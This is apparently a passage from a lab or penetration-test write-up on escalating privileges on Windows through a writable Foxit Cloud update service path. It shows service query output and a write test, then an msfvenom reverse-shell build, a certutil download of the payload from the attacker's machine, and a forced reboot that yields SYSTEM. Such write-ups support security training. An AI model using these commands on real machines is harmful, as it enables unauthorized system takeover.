[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE               : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE         : 2   AUTO_START
ERROR_CONTROL      : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP   :
TAG                : 0
DISPLAY_NAME       : Foxit Cloud Safe Update Service
DEPENDENCIES       :
SERVICE_START_NAME : LocalSystem

I then tested for write privileges in the binary path by creating a text file in the C:\Program Files (x86)\Foxit Software\Foxit Reader\ path.

echo Hello > test.txt

Checking the contents of the directory after doing so we see the test.txt file.

Directory of c:\Program Files (x86)\Foxit Software\Foxit Reader
08/25/2021  12:35 PM    <DIR>          .
08/25/2021  12:35 PM    <DIR>          ..
11/26/2014  06:03 PM           385,248 64BitMailAgent.exe
10/07/2015  04:04 AM    <DIR>          Advertisement
10/07/2015  04:04 AM    <DIR>          docusign
10/07/2015  04:05 AM    <DIR>          Foxit Cloud
08/25/2021  12:32 PM             7,168 Foxit.exe
11/27/2014  10:24 AM        42,164,448 FoxitReader.exe
11/27/2014  03:49 PM            74,588 FoxitReader.exe.man
11/26/2014  06:03 PM         4,856,544 FoxitUpdater.exe
11/26/2014  07:15 PM         1,621,728 FXCUSTOM.dll
10/07/2015  04:04 AM    <DIR>          lex
08/28/2014  10:25 AM            27,076 notice.txt
10/07/2015  04:04 AM    <DIR>          plugins
10/07/2015  04:04 AM    <DIR>          Release Note
11/26/2014  06:03 PM         2,093,280 SendCrashReport.exe
10/07/2015  04:04 AM    <DIR>          Shell Extensions
10/07/2015  04:04 AM    <DIR>          Skins
10/07/2015  04:04 AM    <DIR>          stamps
10/07/2015  04:04 AM    <DIR>          Start
08/25/2021  12:35 PM                 8 test.txt
11/26/2014  07:07 PM         2,302,176 TrackReview.exe
10/07/2015  04:05 AM           278,490 unins000.dat
10/07/2015  04:02 AM         1,479,392 unins000.exe
10/07/2015  04:05 AM            22,701 unins000.msg
11/18/2014  04:38 PM         2,004,704 UninstallPrint.exe
10/07/2015  04:05 AM             1,270 UpdaterInfo.xml
15 File(s)     57,318,821 bytes
12 Dir(s)  13,053,591,552 bytes free

I then performed a test reboot of the machine and confirmed that as the user Daisy I was able to reboot the machine. Currently this looks like we have a path to privilege escalation.

First, using msfvenom, I created a stageless reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.142 LPORT=80 -f exe -o Foxit.exe

I then uploaded this to the directory C:\Program Files (x86)\Foxit Software\Foxit Reader\

certutil.exe -f -urlcache -split http://<IP>/Foxit.exe Foxit.exe

After the upload was completed I started a netcat listener on my attacking machine then rebooted the target system.

shutdown.exe -r -f -t 1

Shortly after I was able to obtain privileges as SYSTEM.
